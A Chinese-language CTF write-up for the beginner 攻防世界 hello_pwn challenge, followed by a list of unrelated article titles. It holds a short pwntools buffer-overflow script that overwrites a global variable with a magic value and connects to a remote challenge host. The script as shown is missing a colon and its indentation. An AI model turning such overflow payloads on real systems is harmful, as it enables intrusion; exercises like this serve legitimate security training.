当前位置:网站首页>攻防世界新手入门hello_pwn
攻防世界新手入门hello_pwn
2022-06-28 12:07:00 【Day-3】

首先,我们先看一下文件。然后看一下它的保护。
没有什么防护。运行一下试试:
放入IDA中查看,
需要我们在unk_601068上填充数据,然后将dword_60106C地址中的内容覆盖为1853186401.
编写Python代码:
from pwn import *
context(os='Linux',arch="amd64",log_level="debug")
content = 1
def main()
if content == 1:
day3 = process("hello_pwn")
else:
day3 =remote("111.200.241.244",49744)
payload = b'a' * (0x6c - 0x68) + p64(1853186401)
day3.recvuntil("lets get helloworld for bof\n")
day3.sendline(payload)
day3.interactive()
main()
process和remote连接本地程序,也就是常说的打本地和打远程。
加b设为比特流,意为传送数据,p64打包,将数据打包成一个字节流。
得到Flag。
边栏推荐
- AcWing 609. Salary (implemented in C language)
- [vi/vim] basic usage and command summary
- AcWing 606. Average 1 (implemented in C language)
- Three ways to implement LRU cache (recommended Collection)
- 6.A-B
- C语言 sprintf函数使用详解
- After importing resources, unity also manually modifies the properties of resources? This code can save you a lot of time: assetpostprocessor
- MapReduce project case 1
- Deep learning has a new pit! The University of Sydney proposed a new cross modal task, using text to guide image matting
- Using MySQL database in the express framework of node
猜你喜欢

【Unity编辑器扩展基础】、GUI

EMC RS485接口EMC电路设计方案

吐血推荐17个提升开发效率的“轮子”

.NET混合开发解决方案24 WebView2对比CefSharp的超强优势

SEO优化的许多好处是与流量有直接关系

不到一小时,苹果摧毁了15家初创公司
![[Beijing University of Aeronautics and Astronautics] information sharing for the first and second examinations of postgraduate entrance examination](/img/06/df5a64441814c9ecfa2f039318496e.jpg)
[Beijing University of Aeronautics and Astronautics] information sharing for the first and second examinations of postgraduate entrance examination

Data analysis learning notes

【Unity编辑器扩展实践】、利用txt模板动态生成UI代码

内部振荡器、无源晶振、有源晶振有什么区别?
随机推荐
Android应用安全之JNI混淆
Connectionreseterror: [winerror 10054] the remote host forced an existing connection to be closed
AcWing 606. Average 1 (implemented in C language)
【Unity编辑器扩展基础】、GUILayout
【Unity编辑器扩展基础】、GUI
【Unity编辑器扩展基础】、EditorGUILayout (三)
MapReduce项目案例3——温度统计
Remoteviews layout and type restriction source code analysis
Research on personalized product search
Zero basic C language (I)
30套JSP网站源代码合集「建议收藏」
【附源码+代码注释】误差状态卡尔曼滤波(error-state Kalman Filter),扩展卡尔曼滤波,实现GPS+IMU融合,EKF ESKF GPS+IMU
MapReduce project case 1
Redis principle - List
Vivo手机的权限管理
SEO优化的许多好处是与流量有直接关系
Redis 原理 - List
Batch will png . bmp . JPEG format pictures are converted to Jpg format picture
Leetcode 48. 旋转图像(可以,已解决)
华泰证券开户安全吗? 开户有风险吗